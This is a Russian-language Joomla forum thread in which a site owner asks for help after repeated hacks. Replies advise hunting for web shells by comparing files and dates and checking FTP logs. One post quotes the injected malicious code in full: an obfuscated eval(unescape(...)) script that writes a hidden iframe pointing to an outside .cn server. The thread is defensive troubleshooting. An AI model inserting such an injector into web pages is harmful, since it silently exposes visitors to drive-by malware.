Неоднократный взлом сайта - Безопасность сайтов на Joomla

ищи по форуму - неоднократно обсуждалось.
всего 3-и или 4-е шага.

P.S> и на антивирус не надо забивать.

Паранойя и Лавра это одно и  то же.
Помимо антивируса и поиска виря у себя рекомендую проверить нет ли шелла на сервере. Опять же смотри в поиске - как искать.

после того как взломали надо искать через что и фиксить дырки

вспоминай откуда ещё по FTP заходил на сайт.
с работы? от друга? второй админ есть на сайте? или дизайнер? шэф?

шелл найти просто - проверь все файлы во всех папках, сравни с дистрибутивом. Если есть лишнее - наверное это оно. Если лишнего нет, проверь все файлы также по датам, в общем все даты должны быть одинаковы, а у шелла будет другая. Ищи по слову шелл, тема обсуждалась и неоднократно.

суть в том что при загрузке страниц пользователя несколько раз кидает на сайты

<html><body bgcolor="#FFFFFF"></body></html><script type='text/javascript'>
<!--
var msg=314,d=document;
eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%30%65%30%32%38%32%34%31%66%31%66%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%73%74%61%62%72%6f%6f%6d%2e%63%6e%2f%33%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%38%34%37%34%30%29%2b%27%33%30%66%64%37%34%63%5c%27%20%77%69%64%74%68%3d%34%34%36%20%68%65%69%67%68%74%3d%31%39%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );
//-->
</script>

Посмотри на какой компонент заходишь?
Перекидыват сразу или на определенных страницах?

а в логах доступа по фтп что нить есть за тот период?

Ищи всё-таки вирус у себя на компе, если больше никому доступ по FTP не давал.